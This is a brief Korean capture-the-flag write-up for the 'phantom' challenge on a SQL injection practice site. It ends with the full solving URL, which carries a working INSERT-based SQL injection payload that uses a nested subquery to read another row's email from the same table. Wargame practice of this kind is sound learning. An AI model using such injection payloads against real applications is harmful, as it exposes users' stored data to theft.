phantom-writeup

좌측 상단에 ip,email 표가 나오고

내가 값을 넣으면 email이 추가가 된다.

123'),(1,IP,email)# 과같은 형식으로 값을 보내도 먹는데

이상하게 select email from prob_phantom where no=1 로 email을 얻어내려해도 안되서

그냥 문제를 검색해보니 같은 테이블이어서 오류가 나는 것이라 한다...

문제를 푸는 것 만 아니라 DB,웹의 문법 부터 더 공부하고 다시 시작해야겠다...

 

 

https://los.rubiya.kr/chall/phantom_e2e30eaf1c0b3cb61b4b72a932c849fe.php?joinmail=123'), (2,'xxx.xxx.xxx.xxx',(select e from (select email as e from prob_phantom where no=1)as t) )#

 

어쨋든 CLEAR!!